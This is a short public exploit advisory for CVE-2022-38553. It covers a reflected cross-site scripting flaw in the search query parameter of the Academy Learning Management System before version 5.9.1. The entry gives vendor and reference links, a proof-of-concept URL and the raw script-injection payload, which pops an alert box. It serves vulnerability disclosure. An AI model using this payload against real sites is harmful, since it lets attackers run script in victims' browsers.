CROSS SITE SCRIPTING (XSS) ON "ACADEMY LEARNING MANAGEMENT SYSTEM" < v5.9.1 - PROOF OF CONCEPT (POC) CVE-2022-38553
Exploit Title: ACADEMY LEARNING MANAGEMENT SYSTEM < v5.9.1 - Cross Site Scripting (XSS)
CVE ID: CVE-2022-38553
Exploit Author: 4websecurity
Author's webpage: https://4websecurity.com
Date: 16-08-2022
Vendor Homepage: https://creativeitem.com
Version: up to 5.9.1
Vendor Demo page: https://demo.creativeitem.com/academy/home/
Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38553
https://www.openbugbounty.org/reports/2849933/
https://cve.report/CVE-2022-38553
https://nvd.nist.gov/vuln/detail/CVE-2022-38553
https://youtu.be/yFiZffHoeKs
Vulnerability field:
- Search parameter (search?query)
Cross-site scripting (XSS) vulnerability in ACADEMY LEARNING MANAGEMENT SYSTEM <5.9.1 allows remote attackers to inject arbitrary web script or HTML via the search?query parameter.
Proof Of Concept (POC):
https://example.com/search?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
Payload:
"><script>alert("XSS")</script>
Security Risk:
This security vulnerability allows to execute arbitrary JavaScript code in user browser if they access URL prepared by attackers.